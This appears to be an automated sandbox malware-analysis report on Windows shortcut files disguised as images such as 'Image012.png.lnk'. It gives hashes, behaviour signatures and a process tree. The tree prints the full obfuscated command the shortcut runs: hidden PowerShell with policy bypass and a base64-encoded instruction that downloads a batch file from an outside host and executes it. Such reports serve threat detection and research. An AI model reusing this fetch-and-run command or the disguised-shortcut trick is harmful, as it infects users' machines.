Analysis
-
max time kernel
120s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
31/01/2024, 08:13
Static task
static1
Behavioral task
behavioral1
Sample
Image012.png.lnk
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
Image012.png.lnk
Resource
win10v2004-20231222-en
Behavioral task
behavioral3
Sample
Photo01.jpg.lnk
Resource
win7-20231129-en
Behavioral task
behavioral4
Sample
Photo01.jpg.lnk
Resource
win10v2004-20231215-en
Behavioral task
behavioral5
Sample
Photo02.jpg.lnk
Resource
win7-20231215-en
Behavioral task
behavioral6
Sample
Photo02.jpg.lnk
Resource
win10v2004-20231215-en
General
-
Target
Image012.png.lnk
-
Size
2KB
-
MD5
395be4940bf35809d5bcfe58646b278c
-
SHA1
02b01088e3bb584641281c36118c930f3c9b963d
-
SHA256
4c5fe2c863349aa4f43dd9f9f932dac11576832a12bc5e84b840c09c1308f540
-
SHA512
9add65f4de5ef386b7191ac869ca1801dcdd9525189fdb94a5d86c82c4c51d983e3966ef148f392d48382588ed8882ea25120dcbd6bc8d8a7e63e362e6b2929b
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2720 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2720 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2652 wrote to memory of 2768 2652 cmd.exe 29 PID 2652 wrote to memory of 2768 2652 cmd.exe 29 PID 2652 wrote to memory of 2768 2652 cmd.exe 29 PID 2768 wrote to memory of 2720 2768 cmd.exe 30 PID 2768 wrote to memory of 2720 2768 cmd.exe 30 PID 2768 wrote to memory of 2720 2768 cmd.exe 30
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Image012.png.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2652 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" Cmd /C pOwerShEll.eXe -EX bYPASs -NOp -W hiDDEN -eC IABpAG4AVgBPAGsARQAtAFcARQBCAHIAZQBxAFUARQBTAFQAIAAJAC0AVQBSAEkAIAAJAB0gaAB0AHQAcAA6AC8ALwB2AHkAYgBzAG4AZgAzAC4AcwBhAC4AYwBvAG0ALwBtAGUAZAAuAGIAYQB0AB0gIAAJAC0AbwBVAHQARgBpAEwARQAgAAkAHSAkAEUAbgBWADoAVABlAE0AUABcAGoAcgBiAGIAcwBmAHIALgBiAGEAdAAdICAACQA7ACAASQBOAFYAbwBrAGUALQBpAFQARQBtACAACQAdICQARQBOAHYAOgB0AEUAbQBwAFwAagByAGIAYgBzAGYAcgAuAGIAYQB0AB0g2⤵
- Suspicious use of WriteProcessMemory
PID:2768 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepOwerShEll.eXe -EX bYPASs -NOp -W hiDDEN -eC IABpAG4AVgBPAGsARQAtAFcARQBCAHIAZQBxAFUARQBTAFQAIAAJAC0AVQBSAEkAIAAJAB0gaAB0AHQAcAA6AC8ALwB2AHkAYgBzAG4AZgAzAC4AcwBhAC4AYwBvAG0ALwBtAGUAZAAuAGIAYQB0AB0gIAAJAC0AbwBVAHQARgBpAEwARQAgAAkAHSAkAEUAbgBWADoAVABlAE0AUABcAGoAcgBiAGIAcwBmAHIALgBiAGEAdAAdICAACQA7ACAASQBOAFYAbwBrAGUALQBpAFQARQBtACAACQAdICQARQBOAHYAOgB0AEUAbQBwAFwAagByAGIAYgBzAGYAcgAuAGIAYQB0AB0g3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2720
-
-